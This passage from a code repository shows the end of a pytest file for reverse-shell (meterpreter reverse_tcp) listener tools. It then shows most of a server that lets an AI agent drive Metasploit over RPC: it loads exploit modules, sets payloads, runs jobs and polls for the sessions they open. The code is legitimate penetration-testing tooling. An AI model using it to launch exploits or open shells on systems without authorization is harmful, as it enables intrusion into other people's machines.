520 | async def test_start_listener_string_options(self, mock_job_environment):
521 | """Test starting listener with string additional options."""
522 | client, mock_rpc = mock_job_environment
523 |
524 | result = await start_listener(
525 | payload_type="windows/meterpreter/reverse_tcp",
526 | lhost="192.168.1.100",
527 | lport=4444,
528 | additional_options="ExitOnSession=true,Verbose=false"
529 | )
530 |
531 | assert result["status"] == "success"
532 | # Verify RPC was called with parsed options
533 | call_args = mock_rpc.call_args
534 | payload_spec = call_args[1]['payload_spec']
535 | assert payload_spec['options']['ExitOnSession'] is True
536 | assert payload_spec['options']['Verbose'] is False
537 |
538 | @pytest.mark.asyncio
539 | async def test_start_listener_invalid_port(self, mock_job_environment):
540 | """Test starting listener with invalid port."""
541 | client, mock_rpc = mock_job_environment
542 |
543 | result = await start_listener(
544 | payload_type="windows/meterpreter/reverse_tcp",
545 | lhost="192.168.1.100",
546 | lport=99999 # Invalid port
547 | )
548 |
549 | assert result["status"] == "error"
550 | assert "Invalid LPORT" in result["message"]
551 |
552 | @pytest.mark.asyncio
553 | async def test_stop_job(self, mock_job_environment):
554 | """Test stopping a job."""
555 | client, mock_rpc = mock_job_environment
556 |
557 | # Mock job exists before stop, gone after stop
558 | client.jobs.list.side_effect = [
559 | {"1234": {"name": "Handler Job"}}, # Before stop
560 | {} # After stop
561 | ]
562 | client.jobs.stop.return_value = "stopped"
563 |
564 | result = await stop_job(1234)
565 |
566 | assert result["status"] == "success"
567 | client.jobs.stop.assert_called_once_with("1234")
568 |
569 |
570 | if __name__ == "__main__":
571 | pytest.main([__file__, "-v"])
572 |
```
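The session and job tests above give `Mock.side_effect` a list, so successive calls return different values: the resource is present on the first lookup and gone on the second. Below is a minimal standalone sketch of that pattern. `stop_and_verify` is a hypothetical helper written for illustration only; it is not part of MetasploitMCP, and it assumes the job list is exposed as a callable.

```python
from unittest.mock import Mock


def stop_and_verify(jobs, job_id):
    """Hypothetical helper: stop a job, then confirm it left the job list."""
    key = str(job_id)
    if key not in jobs.list():      # first call: state before stopping
        return {"status": "error", "message": f"Job {key} not found"}
    jobs.stop(key)
    if key in jobs.list():          # second call: state after stopping
        return {"status": "error", "message": f"Job {key} still running"}
    return {"status": "success", "message": f"Job {key} stopped"}


jobs = Mock()
# Each call to jobs.list() consumes the next item of the side_effect list.
jobs.list.side_effect = [{"1234": {"name": "Handler Job"}}, {}]

result = stop_and_verify(jobs, 1234)
```

A list-valued `side_effect` raises `StopIteration` once it is exhausted, so the list length also documents how many lookups the code under test is expected to make.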
--------------------------------------------------------------------------------
/MetasploitMCP.py:
--------------------------------------------------------------------------------
```python
1 | # -*- coding: utf-8 -*-
2 | import asyncio
3 | import base64
4 | import contextlib
5 | import logging
6 | import os
7 | import pathlib
8 | import re
9 | import shlex
10 | import socket
11 | import subprocess
12 | import sys
13 | from datetime import datetime
14 | from typing import Any, Dict, List, Optional, Tuple, Union
15 |
16 | # --- Third-party Libraries ---
17 | import uvicorn
18 | from fastapi import FastAPI, HTTPException, Request, Response
19 | from mcp.server.fastmcp import FastMCP
20 | from mcp.server.sse import SseServerTransport
21 | from pymetasploit3.msfrpc import MsfConsole, MsfRpcClient, MsfRpcError
22 | from starlette.applications import Starlette
23 | from starlette.routing import Mount, Route, Router
24 |
25 | # --- Configuration & Constants ---
26 |
27 | logging.basicConfig(
28 | level=os.environ.get("LOG_LEVEL", "INFO").upper(),
29 | format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
30 | )
31 | logger = logging.getLogger("metasploit_mcp_server")
32 | session_shell_type: Dict[str, str] = {}
33 |
34 | # Metasploit Connection Config (from environment variables)
35 | MSF_PASSWORD = os.getenv('MSF_PASSWORD', 'yourpassword')
36 | MSF_SERVER = os.getenv('MSF_SERVER', '127.0.0.1')
37 | MSF_PORT_STR = os.getenv('MSF_PORT', '55553')
38 | MSF_SSL_STR = os.getenv('MSF_SSL', 'false')
39 | PAYLOAD_SAVE_DIR = os.environ.get('PAYLOAD_SAVE_DIR', str(pathlib.Path.home() / "payloads"))
40 |
41 | # Timeouts and Polling Intervals (in seconds)
42 | DEFAULT_CONSOLE_READ_TIMEOUT = 15 # Default for quick console commands
43 | LONG_CONSOLE_READ_TIMEOUT = 60 # For commands like run/exploit/check
44 | SESSION_COMMAND_TIMEOUT = 60 # Default for commands within sessions
45 | SESSION_READ_INACTIVITY_TIMEOUT = 10 # Timeout if no data from session
46 | EXPLOIT_SESSION_POLL_TIMEOUT = 60 # Max time to wait for session after exploit job
47 | EXPLOIT_SESSION_POLL_INTERVAL = 2 # How often to check for session
48 | RPC_CALL_TIMEOUT = 30 # Default timeout for RPC calls like listing modules
49 |
50 | # Regular Expressions for Prompt Detection
51 | MSF_PROMPT_RE = re.compile(rb'\x01\x02msf\d+\x01\x02 \x01\x02> \x01\x02') # Matches the msf6 > prompt with control chars
52 | SHELL_PROMPT_RE = re.compile(r'([#$>]|%)\s*$') # Matches common shell prompts (#, $, >, %) at end of line
53 |
54 | # --- Metasploit Client Setup ---
55 |
56 | _msf_client_instance: Optional[MsfRpcClient] = None
57 |
58 | def initialize_msf_client() -> MsfRpcClient:
59 | """
60 | Initializes the global Metasploit RPC client instance.
61 | Raises exceptions on failure.
62 | """
63 | global _msf_client_instance
64 | if _msf_client_instance is not None:
65 | return _msf_client_instance
66 |
67 | logger.info("Attempting to initialize Metasploit RPC client...")
68 |
69 | try:
70 | msf_port = int(MSF_PORT_STR)
71 | msf_ssl = MSF_SSL_STR.lower() == 'true'
72 | except ValueError as e:
73 | logger.error(f"Invalid MSF connection parameters (PORT: {MSF_PORT_STR}, SSL: {MSF_SSL_STR}). Error: {e}")
74 | raise ValueError("Invalid MSF connection parameters") from e
75 |
76 | try:
77 | logger.debug(f"Attempting to create MsfRpcClient connection to {MSF_SERVER}:{msf_port} (SSL: {msf_ssl})...")
78 | client = MsfRpcClient(
79 | password=MSF_PASSWORD,
80 | server=MSF_SERVER,
81 | port=msf_port,
82 | ssl=msf_ssl
83 | )
84 | # Test connection during initialization
85 | logger.debug("Testing connection with core.version call...")
86 | version_info = client.core.version
87 | msf_version = version_info.get('version', 'unknown') if isinstance(version_info, dict) else 'unknown'
88 | logger.info(f"Successfully connected to Metasploit RPC at {MSF_SERVER}:{msf_port} (SSL: {msf_ssl}), version: {msf_version}")
89 | _msf_client_instance = client
90 | return _msf_client_instance
91 | except MsfRpcError as e:
92 | logger.error(f"Failed to connect or authenticate to Metasploit RPC ({MSF_SERVER}:{msf_port}, SSL: {msf_ssl}): {e}")
93 | raise ConnectionError(f"Failed to connect/authenticate to Metasploit RPC: {e}") from e
94 | except Exception as e:
95 | logger.error(f"An unexpected error occurred during MSF client initialization: {e}", exc_info=True)
96 | raise RuntimeError(f"Unexpected error initializing MSF client: {e}") from e
97 |
98 | def get_msf_client() -> MsfRpcClient:
99 | """Gets the initialized MSF client instance, raising an error if not ready."""
100 | if _msf_client_instance is None:
101 | logger.error("Metasploit client has not been initialized. Check MSF server connection.")
102 | raise ConnectionError("Metasploit client has not been initialized.") # Strict check preferred
103 | logger.debug("Retrieved MSF client instance successfully.")
104 | return _msf_client_instance
105 |
106 | async def check_msf_connection() -> Dict[str, Any]:
107 | """
108 | Check the current status of the Metasploit RPC connection.
109 | Returns connection status information for debugging.
110 | """
111 | try:
112 | client = get_msf_client()
113 | logger.debug(f"Testing MSF connection with {RPC_CALL_TIMEOUT}s timeout...")
114 | version_info = await asyncio.wait_for(
115 | asyncio.to_thread(lambda: client.core.version),
116 | timeout=RPC_CALL_TIMEOUT
117 | )
118 | msf_version = version_info.get('version', 'N/A') if isinstance(version_info, dict) else 'N/A'
119 | return {
120 | "status": "connected",
121 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
122 | "ssl": MSF_SSL_STR,
123 | "version": msf_version,
124 | "message": "Connection to Metasploit RPC is healthy"
125 | }
126 | except asyncio.TimeoutError:
127 | return {
128 | "status": "timeout",
129 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
130 | "ssl": MSF_SSL_STR,
131 | "timeout_seconds": RPC_CALL_TIMEOUT,
132 | "message": f"Metasploit server not responding within {RPC_CALL_TIMEOUT}s timeout"
133 | }
134 | except ConnectionError as e:
135 | return {
136 | "status": "not_initialized",
137 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
138 | "ssl": MSF_SSL_STR,
139 | "message": f"Metasploit client not initialized: {e}"
140 | }
141 | except MsfRpcError as e:
142 | return {
143 | "status": "rpc_error",
144 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
145 | "ssl": MSF_SSL_STR,
146 | "message": f"Metasploit RPC error: {e}"
147 | }
148 | except Exception as e:
149 | return {
150 | "status": "error",
151 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
152 | "ssl": MSF_SSL_STR,
153 | "message": f"Unexpected error: {e}"
154 | }
155 |
156 | @contextlib.asynccontextmanager
157 | async def get_msf_console() -> MsfConsole:
158 | """
159 | Async context manager for creating and reliably destroying an MSF console.
160 | """
161 | client = get_msf_client() # Raises ConnectionError if not initialized
162 | console_object: Optional[MsfConsole] = None
163 | console_id_str: Optional[str] = None
164 | try:
165 | logger.debug("Creating temporary MSF console...")
166 | # Create console object directly
167 | console_object = await asyncio.to_thread(lambda: client.consoles.console())
168 |
169 | # Get ID using .cid attribute
170 | if isinstance(console_object, MsfConsole) and hasattr(console_object, 'cid'):
171 | console_id_val = getattr(console_object, 'cid')
172 | console_id_str = str(console_id_val) if console_id_val is not None else None
173 | if not console_id_str:
174 | raise ValueError("Console object created, but .cid attribute is empty or None.")
175 | logger.info(f"MSF console created (ID: {console_id_str})")
176 |
177 | # Read initial prompt/banner to clear buffer and ensure readiness
178 | await asyncio.sleep(0.2) # Short delay for prompt to appear
179 | initial_read = await asyncio.to_thread(lambda: console_object.read())
180 | logger.debug(f"Initial console read (clearing buffer): {initial_read}")
181 | yield console_object # Yield the ready console object
182 | else:
183 | # This case should ideally not happen if .console() works as expected
184 | logger.error(f"client.consoles.console() did not return expected MsfConsole object with .cid. Got type: {type(console_object)}")
185 | raise MsfRpcError(f"Unexpected result from console creation: {console_object}")
186 |
187 | except MsfRpcError as e:
188 | logger.error(f"MsfRpcError during console operation: {e}")
189 | raise MsfRpcError(f"Error creating/accessing MSF console: {e}") from e
190 | except Exception as e:
191 | logger.exception("Unexpected error during console creation/setup")
192 | raise RuntimeError(f"Unexpected error during console operation: {e}") from e
193 | finally:
194 | # Destruction Logic
195 | if console_id_str and _msf_client_instance: # Check client still exists
196 | try:
197 | logger.info(f"Attempting to destroy Metasploit console (ID: {console_id_str})...")
198 | # Bind cid as a default argument so the lambda captures its current value
199 | destroy_result = await asyncio.to_thread(
200 | lambda cid=console_id_str: _msf_client_instance.consoles.destroy(cid)
201 | )
202 | logger.debug(f"Console destroy result: {destroy_result}")
203 | except Exception as e:
204 | # Log error but don't raise exception during cleanup
205 | logger.error(f"Error destroying MSF console {console_id_str}: {e}")
206 | elif console_object and not console_id_str:
207 | logger.warning("Console object created but no valid ID obtained, cannot explicitly destroy.")
208 | # else: logger.debug("No console ID obtained, skipping destruction.")
209 |
210 | async def run_command_safely(console: MsfConsole, cmd: str, execution_timeout: Optional[int] = None) -> str:
211 | """
212 | Safely run a command on a Metasploit console and return the output.
213 | Relies primarily on detecting the MSF prompt for command completion.
214 |
215 | Args:
216 | console: The Metasploit console object (MsfConsole).
217 | cmd: The command to run.
218 | execution_timeout: Optional specific timeout for this command's execution phase.
219 |
220 | Returns:
221 | The command output as a string.
222 | """
223 | if not (hasattr(console, 'write') and hasattr(console, 'read')):
224 | logger.error(f"Console object {type(console)} lacks required methods (write, read).")
225 | raise TypeError("Unsupported console object type for command execution.")
226 |
227 | try:
228 | logger.debug(f"Running console command: {cmd}")
229 | await asyncio.to_thread(lambda: console.write(cmd + '\n'))
230 |
231 | output_buffer = b"" # Read as bytes to handle potential encoding issues and prompt matching
232 | start_time = asyncio.get_event_loop().time()
233 |
234 | # Determine overall read timeout: explicit value if given, else long for run/exploit/check, default otherwise
235 | read_timeout = execution_timeout or (LONG_CONSOLE_READ_TIMEOUT if cmd.strip().startswith(("run", "exploit", "check")) else DEFAULT_CONSOLE_READ_TIMEOUT)
236 | check_interval = 0.1 # Seconds between reads
237 | last_data_time = start_time
238 |
239 | while True:
240 | await asyncio.sleep(check_interval)
241 | current_time = asyncio.get_event_loop().time()
242 |
243 | # Check overall timeout first
244 | if (current_time - start_time) > read_timeout:
245 | logger.warning(f"Overall timeout ({read_timeout}s) reached for console command '{cmd}'.")
246 | break
247 |
248 | # Read available data
249 | try:
250 | chunk_result = await asyncio.to_thread(lambda: console.read())
251 | # console.read() returns {'data': '...', 'prompt': '...', 'busy': bool}
252 | chunk_data = chunk_result.get('data', '').encode('utf-8', errors='replace') # Ensure bytes
253 |
254 | # Handle the prompt - ensure it's bytes for pattern matching
255 | prompt_str = chunk_result.get('prompt', '')
256 | prompt_bytes = prompt_str.encode('utf-8', errors='replace') if isinstance(prompt_str, str) else prompt_str
257 | except Exception as read_err:
258 | logger.warning(f"Error reading from console during command '{cmd}': {read_err}")
259 | await asyncio.sleep(0.5) # Wait a bit before retrying or timing out
260 | continue
261 |
262 | if chunk_data:
263 | # logger.debug(f"Read chunk (bytes): {chunk_data[:100]}...") # Log sparingly
264 | output_buffer += chunk_data
265 | last_data_time = current_time # Reset inactivity timer
266 |
267 | # Primary Completion Check: Did we receive the prompt?
268 | if prompt_bytes and MSF_PROMPT_RE.search(prompt_bytes):
269 | logger.debug(f"Detected MSF prompt in console.read() result for '{cmd}'. Command likely complete.")
270 | break
271 | # Secondary Check: Does the buffered output contain the prompt anywhere?
272 | # Needed if prompt wasn't in the last read chunk but arrived earlier.
273 | if MSF_PROMPT_RE.search(output_buffer):
274 | logger.debug(f"Detected MSF prompt in buffered output for '{cmd}'. Command likely complete.")
275 | break
276 |
277 | # Fallback Completion Check: Inactivity timeout
278 | elif (current_time - last_data_time) > SESSION_READ_INACTIVITY_TIMEOUT: # Use a shorter inactivity timeout here
279 | logger.debug(f"Console inactivity timeout ({SESSION_READ_INACTIVITY_TIMEOUT}s) reached for command '{cmd}'. Assuming complete.")
280 | break
281 |
282 | # Decode the final buffer
283 | final_output = output_buffer.decode('utf-8', errors='replace').strip()
284 | logger.debug(f"Final output for '{cmd}' (length {len(final_output)}):\n{final_output[:500]}{'...' if len(final_output) > 500 else ''}")
285 | return final_output
286 |
287 | except Exception as e:
288 | logger.exception(f"Error executing console command '{cmd}'")
289 | raise RuntimeError(f"Failed executing console command '{cmd}': {e}") from e
290 |
291 | from mcp.server.session import ServerSession
292 |
293 | ####################################################################################
294 | # Temporary monkeypatch which avoids crashing when a POST message is received
295 | # before a connection has been initialized, e.g. after a deployment.
296 | # pylint: disable-next=protected-access
297 | old__received_request = ServerSession._received_request
298 |
299 |
300 | async def _received_request(self, *args, **kwargs):
301 | try:
302 | return await old__received_request(self, *args, **kwargs)
303 | except RuntimeError as e:
304 | logger.warning(f"Ignoring request received before session initialization: {e}")
305 |
306 |
307 | # pylint: disable-next=protected-access
308 | ServerSession._received_request = _received_request
309 | ####################################################################################
310 |
311 | # --- MCP Server Initialization ---
312 | mcp = FastMCP("Metasploit Tools Enhanced (Streamlined)")
313 |
314 | # --- Internal Helper Functions ---
315 |
316 | def _parse_options_gracefully(options: Union[Dict[str, Any], str, None]) -> Dict[str, Any]:
317 | """
318 | Gracefully parse options from different formats.
319 |
320 | Handles:
321 | - Dict format (correct): {"key": "value", "key2": "value2"}
322 | - String format (common mistake): "key=value,key2=value2"
323 | - None: returns empty dict
324 |
325 | Args:
326 | options: Options in dict format, string format, or None
327 |
328 | Returns:
329 | Dictionary of parsed options
330 |
331 | Raises:
332 | ValueError: If string format is malformed
333 | """
334 | if options is None:
335 | return {}
336 |
337 | if isinstance(options, dict):
338 | # Already correct format
339 | return options
340 |
341 | if isinstance(options, str):
342 | # Handle the common mistake format: "key=value,key2=value2"
343 | if not options.strip():
344 | return {}
345 |
346 | logger.info(f"Converting string format options to dict: {options}")
347 | parsed_options = {}
348 |
349 | try:
350 | # Split by comma and then by equals
351 | pairs = [pair.strip() for pair in options.split(',') if pair.strip()]
352 | for pair in pairs:
353 | if '=' not in pair:
354 | raise ValueError(f"Invalid option format: '{pair}' (missing '=')")
355 |
356 | key, value = pair.split('=', 1) # Split only on first '='
357 | key = key.strip()
358 | value = value.strip()
359 |
360 | # Validate key is not empty
361 | if not key:
362 | raise ValueError(f"Invalid option format: '{pair}' (empty key)")
363 |
364 | # Remove quotes if they wrap the entire value
365 | if (value.startswith('"') and value.endswith('"')) or \
366 | (value.startswith("'") and value.endswith("'")):
367 | value = value[1:-1]
368 |
369 | # Basic type conversion
370 | if value.lower() in ('true', 'false'):
371 | value = value.lower() == 'true'
372 | elif value.isdigit():
373 | try:
374 | value = int(value)
375 | except ValueError:
376 | pass # Keep as string if conversion fails
377 |
378 | parsed_options[key] = value
379 |
380 | logger.info(f"Successfully converted string options to dict: {parsed_options}")
381 | return parsed_options
382 |
383 | except Exception as e:
384 | raise ValueError(f"Failed to parse options string '{options}': {e}. Expected format: 'key=value,key2=value2' or dict {{'key': 'value'}}") from e
385 |
386 | # For any other type, try to convert to dict
387 | try:
388 | return dict(options)
389 | except (TypeError, ValueError) as e:
390 | raise ValueError(f"Options must be a dictionary or comma-separated string format 'key=value,key2=value2'. Got {type(options)}: {options}") from e
391 |
392 | async def _get_module_object(module_type: str, module_name: str) -> Any:
393 | """Gets the MSF module object, handling potential path variations."""
394 | client = get_msf_client()
395 | base_module_name = module_name # Start assuming it's the base name
396 | if '/' in module_name:
397 | parts = module_name.split('/')
398 | if parts[0] in ('exploit', 'payload', 'post', 'auxiliary', 'encoder', 'nop'):
399 | # Looks like full path, extract base name
400 | base_module_name = '/'.join(parts[1:])
401 | if module_type != parts[0]:
402 | logger.warning(f"Module type mismatch: expected '{module_type}', got path starting with '{parts[0]}'. Using provided type.")
403 | # Else: Assume it's like 'windows/smb/ms17_010_eternalblue' - already the base name
404 |
405 | logger.debug(f"Attempting to retrieve module: client.modules.use('{module_type}', '{base_module_name}')")
406 | try:
407 | module_obj = await asyncio.to_thread(lambda: client.modules.use(module_type, base_module_name))
408 | logger.debug(f"Successfully retrieved module object for {module_type}/{base_module_name}")
409 | return module_obj
410 | except (MsfRpcError, KeyError) as e:
411 | # KeyError can be raised by pymetasploit3 if module not found
412 | error_str = str(e).lower()
413 | if "unknown module" in error_str or "invalid module" in error_str or isinstance(e, KeyError):
414 | logger.error(f"Module {module_type}/{base_module_name} (from input {module_name}) not found.")
415 | raise ValueError(f"Module '{module_name}' of type '{module_type}' not found.") from e
416 | else:
417 | logger.error(f"MsfRpcError getting module {module_type}/{base_module_name}: {e}")
418 | raise MsfRpcError(f"Error retrieving module '{module_name}': {e}") from e
419 |
420 | async def _set_module_options(module_obj: Any, options: Dict[str, Any]):
421 | """Sets options on a module object, performing basic type guessing."""
422 | logger.debug(f"Setting options for module {getattr(module_obj, 'fullname', '')}: {options}")
423 | for k, v in options.items():
424 | # Basic type guessing
425 | original_value = v
426 | if isinstance(v, str):
427 | if v.isdigit():
428 | try: v = int(v)
429 | except ValueError: pass # Keep as string if int() rejects it (e.g. non-ASCII digit characters)
430 | elif v.lower() in ('true', 'false'):
431 | v = v.lower() == 'true'
432 | # Add more specific checks if needed (e.g., for file paths)
433 | elif isinstance(v, (int, bool)):
434 | pass # Already correct type
435 | # Add handling for other types like lists if necessary
436 |
437 | try:
438 | # Use lambda to capture current k, v for the thread
439 | await asyncio.to_thread(lambda key=k, value=v: module_obj.__setitem__(key, value))
440 | # logger.debug(f"Set option {k}={v} (original: {original_value})")
441 | except (MsfRpcError, KeyError, TypeError) as e:
442 | # Catch potential errors if option doesn't exist or type is wrong
443 | logger.error(f"Failed to set option {k}={v} on module: {e}")
444 | raise ValueError(f"Failed to set option '{k}' to '{original_value}': {e}") from e
445 |
446 | async def _execute_module_rpc(
447 | module_type: str,
448 | module_name: str, # Can be full path or base name
449 | module_options: Dict[str, Any],
450 | payload_spec: Optional[Union[str, Dict[str, Any]]] = None # Payload name or {name: ..., options: ...}
451 | ) -> Dict[str, Any]:
452 | """
453 | Helper to execute an exploit, auxiliary, or post module as a background job via RPC.
454 | Includes polling logic for exploit sessions.
455 | """
456 | client = get_msf_client()
457 | module_obj = await _get_module_object(module_type, module_name) # Handles path variants
458 | full_module_path = getattr(module_obj, 'fullname', f"{module_type}/{module_name}") # Get canonical name
459 |
460 | await _set_module_options(module_obj, module_options)
461 |
462 | payload_obj_to_pass = None
463 | payload_name_for_log = None
464 | payload_options_for_log = None
465 |
466 | # Prepare payload if needed (primarily for exploits, also used by start_listener)
467 | if module_type == 'exploit' and payload_spec:
468 | if isinstance(payload_spec, str):
469 | payload_name_for_log = payload_spec
470 | # Passing name string directly is supported by exploit.execute
471 | payload_obj_to_pass = payload_name_for_log
472 | logger.info(f"Executing {full_module_path} with payload '{payload_name_for_log}' (passed as string).")
473 | elif isinstance(payload_spec, dict) and 'name' in payload_spec:
474 | payload_name = payload_spec['name']
475 | payload_options = payload_spec.get('options', {})
476 | payload_name_for_log = payload_name
477 | payload_options_for_log = payload_options
478 | try:
479 | payload_obj = await _get_module_object('payload', payload_name)
480 | await _set_module_options(payload_obj, payload_options)
481 | payload_obj_to_pass = payload_obj # Pass the configured payload object
482 | logger.info(f"Executing {full_module_path} with configured payload object for '{payload_name}'.")
483 | except (ValueError, MsfRpcError) as e:
484 | logger.error(f"Failed to prepare payload object for '{payload_name}': {e}")
485 | return {"status": "error", "message": f"Failed to prepare payload '{payload_name}': {e}"}
486 | else:
487 | logger.warning(f"Invalid payload_spec format: {payload_spec}. Expected string or dict with 'name'.")
488 | return {"status": "error", "message": "Invalid payload specification format."}
489 |
490 | logger.info(f"Executing module {full_module_path} as background job via RPC...")
491 | try:
492 | if module_type == 'exploit':
493 | exec_result = await asyncio.to_thread(lambda: module_obj.execute(payload=payload_obj_to_pass))
494 | else: # auxiliary, post
495 | exec_result = await asyncio.to_thread(lambda: module_obj.execute())
496 |
497 | logger.info(f"RPC execute() result for {full_module_path}: {exec_result}")
498 |
499 | # --- Process Execution Result ---
500 | if not isinstance(exec_result, dict):
501 | logger.error(f"Unexpected result type from {module_type} execution: {type(exec_result)} - {exec_result}")
502 | return {"status": "error", "message": f"Unexpected result from module execution: {exec_result}", "module": full_module_path}
503 |
504 | if exec_result.get('error', False):
505 | error_msg = exec_result.get('error_message', exec_result.get('error_string', 'Unknown RPC error during execution'))
506 | logger.error(f"Failed to start job for {full_module_path}: {error_msg}")
507 | # Check for common errors
508 | if "could not bind" in error_msg.lower():
509 | return {"status": "error", "message": f"Job start failed: Address/Port likely already in use. {error_msg}", "module": full_module_path}
510 | return {"status": "error", "message": f"Failed to start job: {error_msg}", "module": full_module_path}
511 |
512 | job_id = exec_result.get('job_id')
513 | uuid = exec_result.get('uuid')
514 |
515 | if job_id is None:
516 | logger.warning(f"{module_type.capitalize()} job executed but no job_id returned: {exec_result}")
517 | # Handlers sometimes start without returning a job_id; look for a matching job in the job list instead
518 | if module_type == 'exploit' and 'handler' in full_module_path:
519 | # Check jobs list for a match based on payload/lhost/lport
520 | await asyncio.sleep(1.0)
521 | jobs_list = await asyncio.to_thread(lambda: client.jobs.list)
522 | for jid, jinfo in jobs_list.items():
523 | if isinstance(jinfo, dict) and jinfo.get('name','').endswith('Handler') and \
524 | jinfo.get('datastore',{}).get('LHOST') == module_options.get('LHOST') and \
525 | jinfo.get('datastore',{}).get('LPORT') == module_options.get('LPORT') and \
526 | jinfo.get('datastore',{}).get('PAYLOAD') == payload_name_for_log:
527 | logger.info(f"Found probable handler job {jid} matching parameters.")
528 | return {"status": "success", "message": f"Listener likely started as job {jid}", "job_id": jid, "uuid": uuid, "module": full_module_path}
529 |
530 | return {"status": "unknown", "message": f"{module_type.capitalize()} executed, but no job ID returned.", "result": exec_result, "module": full_module_path}
531 |
532 | # --- Exploit Specific: Poll for Session ---
533 | found_session_id = None
534 | if module_type == 'exploit' and uuid:
535 | start_time = asyncio.get_event_loop().time()
536 | logger.info(f"Exploit job {job_id} (UUID: {uuid}) started. Polling for session (timeout: {EXPLOIT_SESSION_POLL_TIMEOUT}s)...")
537 | while (asyncio.get_event_loop().time() - start_time) < EXPLOIT_SESSION_POLL_TIMEOUT:
538 | try:
539 | sessions_list = await asyncio.to_thread(lambda: client.sessions.list)
540 | for s_id, s_info in sessions_list.items():
541 | # Ensure comparison is robust (uuid might be str or bytes, info dict keys too)
542 | s_id_str = str(s_id)
543 | if isinstance(s_info, dict) and str(s_info.get('exploit_uuid')) == str(uuid):
544 | found_session_id = s_id # Keep original type from list keys
545 | logger.info(f"Found matching session {found_session_id} for job {job_id} (UUID: {uuid})")
546 | break # Exit inner loop
547 |
548 | if found_session_id is not None: break # Exit outer loop
549 |
550 | # Optional: Check if job died prematurely
551 | # job_info = await asyncio.to_thread(lambda: client.jobs.info(str(job_id)))
552 | # if not job_info or job_info.get('status') != 'running':
553 | # logger.warning(f"Job {job_id} stopped or disappeared during session polling.")
554 | # break
555 |
556 | except MsfRpcError as poll_e: logger.warning(f"Error during session polling: {poll_e}")
557 | except Exception as poll_e: logger.error(f"Unexpected error during polling: {poll_e}", exc_info=True); break
558 |
559 | await asyncio.sleep(EXPLOIT_SESSION_POLL_INTERVAL)
560 |
561 | if found_session_id is None:
562 | logger.warning(f"Polling timeout ({EXPLOIT_SESSION_POLL_TIMEOUT}s) reached for job {job_id}, no matching session found.")
563 |
564 | # --- Construct Final Success/Warning Message ---
565 | message = f"{module_type.capitalize()} module {full_module_path} started as job {job_id}."
566 | status = "success"
567 | if module_type == 'exploit':
568 | if found_session_id is not None:
569 | message += f" Session {found_session_id} created."
570 | else:
571 | message += " No session detected within timeout."
572 | status = "warning" # Indicate job started but session didn't appear
573 |
574 | return {
575 | "status": status, "message": message, "job_id": job_id, "uuid": uuid,
576 | "session_id": found_session_id, # None if not found/not applicable
577 | "module": full_module_path, "options": module_options,
578 | "payload_name": payload_name_for_log, # Include payload info if exploit
579 | "payload_options": payload_options_for_log
580 | }
581 |
582 | except (MsfRpcError, ValueError) as e: # Catch module prep errors too
583 | error_str = str(e).lower()
584 | logger.error(f"Error executing module {full_module_path} via RPC: {e}")
585 | if "missing required option" in error_str or "invalid option" in error_str:
586 | missing = getattr(module_obj, 'missing_required', [])
587 | return {"status": "error", "message": f"Missing/invalid options for {full_module_path}: {e}", "missing_required": missing}
588 | elif "invalid payload" in error_str:
589 | return {"status": "error", "message": f"Invalid payload specified: {payload_name_for_log or 'None'}. {e}"}
590 | return {"status": "error", "message": f"Error running {full_module_path}: {e}"}
591 | except Exception as e:
592 | logger.exception(f"Unexpected error executing module {full_module_path} via RPC")
593 | return {"status": "error", "message": f"Unexpected server error running {full_module_path}: {e}"}
594 |
595 | async def _execute_module_console(
596 | module_type: str,
597 | module_name: str, # Can be full path or base name
598 | module_options: Dict[str, Any],
599 | command: str, # Typically 'exploit', 'run', or 'check'
600 | payload_spec: Optional[Union[str, Dict[str, Any]]] = None,
601 | timeout: int = LONG_CONSOLE_READ_TIMEOUT
602 | ) -> Dict[str, Any]:
603 | """Helper to execute a module synchronously via console."""
604 | # Determine full path needed for 'use' command
605 | if '/' not in module_name:
606 | full_module_path = f"{module_type}/{module_name}"
607 | else:
608 | # Assume full path or relative path was given; ensure type prefix
609 | if not module_name.startswith(module_type + '/'):
610 | # e.g., got 'windows/x', type 'exploit' -> 'exploit/windows/x'
611 | # e.g., got 'exploit/windows/x', type 'exploit' -> 'exploit/windows/x' (no change)
612 | if not any(module_name.startswith(pfx + '/') for pfx in ['exploit', 'payload', 'post', 'auxiliary', 'encoder', 'nop']):
613 | full_module_path = f"{module_type}/{module_name}"
614 | else: # Already has a type prefix, use it as is
615 | full_module_path = module_name
616 | else: # Starts with correct type prefix
617 | full_module_path = module_name
618 |
619 | logger.info(f"Executing {full_module_path} synchronously via console (command: {command})...")
620 |
621 | payload_name_for_log = None
622 | payload_options_for_log = None
623 |
624 | async with get_msf_console() as console:
625 | try:
626 | setup_commands = [f"use {full_module_path}"]
627 |
628 | # Add module options
629 | for key, value in module_options.items():
630 | val_str = str(value)
631 | if isinstance(value, str) and any(c in val_str for c in [' ', '"', "'", '\\']):
632 | val_str = shlex.quote(val_str)
633 | elif isinstance(value, bool):
634 | val_str = str(value).lower() # MSF console expects lowercase bools
635 | setup_commands.append(f"set {key} {val_str}")
636 |
637 | # Add payload and payload options (if applicable)
638 | if payload_spec:
639 | payload_name = None
640 | payload_options = {}
641 | if isinstance(payload_spec, str):
642 | payload_name = payload_spec
643 | elif isinstance(payload_spec, dict) and 'name' in payload_spec:
644 | payload_name = payload_spec['name']
645 | payload_options = payload_spec.get('options', {})
646 |
647 | if payload_name:
648 | payload_name_for_log = payload_name
649 | payload_options_for_log = payload_options
650 | # Need base name for 'set PAYLOAD'
651 | if '/' in payload_name:
652 | parts = payload_name.split('/')
653 | if parts[0] == 'payload': payload_base_name = '/'.join(parts[1:])
654 | else: payload_base_name = payload_name # Assume relative
655 | else: payload_base_name = payload_name # Assume just name
656 |
657 | setup_commands.append(f"set PAYLOAD {payload_base_name}")
658 | for key, value in payload_options.items():
659 | val_str = str(value)
660 | if isinstance(value, str) and any(c in val_str for c in [' ', '"', "'", '\\']):
661 | val_str = shlex.quote(val_str)
662 | elif isinstance(value, bool):
663 | val_str = str(value).lower()
664 | setup_commands.append(f"set {key} {val_str}")
665 |
666 | # Execute setup commands
667 | for cmd in setup_commands:
668 | setup_output = await run_command_safely(console, cmd, execution_timeout=DEFAULT_CONSOLE_READ_TIMEOUT)
669 | # Basic error check in setup output
